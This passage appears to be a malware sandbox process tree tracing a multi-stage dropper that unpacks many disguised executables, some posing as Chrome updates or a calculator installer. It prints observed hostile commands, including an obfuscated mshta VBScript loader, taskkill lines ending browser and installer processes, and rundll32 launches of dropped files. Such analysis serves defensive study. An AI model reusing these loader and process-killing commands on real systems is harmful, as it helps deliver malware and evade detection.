C:\Users\Admin\Pictures\Adobe Films\MZexYDOrOLntoqOqfj6o77iI.exe"C:\Users\Admin\Pictures\Adobe Films\MZexYDOrOLntoqOqfj6o77iI.exe"6⤵PID:2356
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07d46efb4bd1.exe4⤵
- Loads dropped DLL
PID:744 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07d46efb4bd1.exeSun07d46efb4bd1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:976 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2348
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun078a90701e.exe4⤵
- Loads dropped DLL
PID:812 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun078a90701e.exeSun078a90701e.exe5⤵
- Executes dropped EXE
PID:360 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵PID:2100
-
C:\Users\Admin\AppData\Roaming\6267732.exe"C:\Users\Admin\AppData\Roaming\6267732.exe"8⤵PID:2176
-
-
C:\Users\Admin\AppData\Roaming\5678468.exe"C:\Users\Admin\AppData\Roaming\5678468.exe"8⤵PID:2316
-
-
C:\Users\Admin\AppData\Roaming\8255491.exe"C:\Users\Admin\AppData\Roaming\8255491.exe"8⤵PID:2672
-
-
C:\Users\Admin\AppData\Roaming\2223985.exe"C:\Users\Admin\AppData\Roaming\2223985.exe"8⤵PID:1348
-
-
C:\Users\Admin\AppData\Roaming\4525193.exe"C:\Users\Admin\AppData\Roaming\4525193.exe"8⤵PID:2688
-
-
C:\Users\Admin\AppData\Roaming\2503320.exe"C:\Users\Admin\AppData\Roaming\2503320.exe"8⤵PID:2820
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\2503320.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\2503320.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )9⤵PID:188
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\2503320.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\2503320.exe" ) do taskkill -F -IM "%~Nxv"10⤵PID:2740
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "2503320.exe"11⤵
- Kills process with taskkill
PID:1808
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\8306000.exe"C:\Users\Admin\AppData\Roaming\8306000.exe"8⤵PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵PID:2964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 14248⤵
- Program crash
PID:1400
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1768
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵PID:2440
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵PID:740
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵PID:792
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵PID:460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:640
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:1976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"7⤵PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:1348
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:1904
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07d7bdaf7c.exe4⤵
- Loads dropped DLL
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07d7bdaf7c.exeSun07d7bdaf7c.exe5⤵
- Executes dropped EXE
PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07a9799f68e7.exe /mixtwo4⤵
- Loads dropped DLL
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07a9799f68e7.exeSun07a9799f68e7.exe /mixtwo5⤵PID:1768
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07a9799f68e7.exeSun07a9799f68e7.exe /mixtwo1⤵
- Executes dropped EXE
PID:1236
-
C:\Windows\system32\taskeng.exetaskeng.exe {BD38F809-82F9-409F-BD22-F66753B9433D} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]1⤵PID:2576
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe2⤵PID:2192
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2176
-
-
C:\Users\Admin\AppData\Roaming\viteejjC:\Users\Admin\AppData\Roaming\viteejj2⤵PID:2940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>cxQOi7.xVE"1⤵PID:964
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\TSiZ8.~1⤵PID:1884
-
C:\Windows\SysWOW64\control.execontrol ..\TSiZ8.~1⤵PID:2096
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "1⤵PID:2180
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2396 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2652
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:1928
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211114101744.log C:\Windows\Logs\CBS\CbsPersist_20211114101744.cab1⤵PID:2820
-
C:\Windows\system32\taskeng.exetaskeng.exe {55C1C84D-2549-4BCE-B866-7852B605F99E} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2204
-
C:\Windows\system32\taskeng.exetaskeng.exe {49C40F3B-C3BB-46EF-AE80-8018987CAEA9} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\7206.exeC:\Users\Admin\AppData\Local\Temp\7206.exe1⤵PID:1940
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:2280
-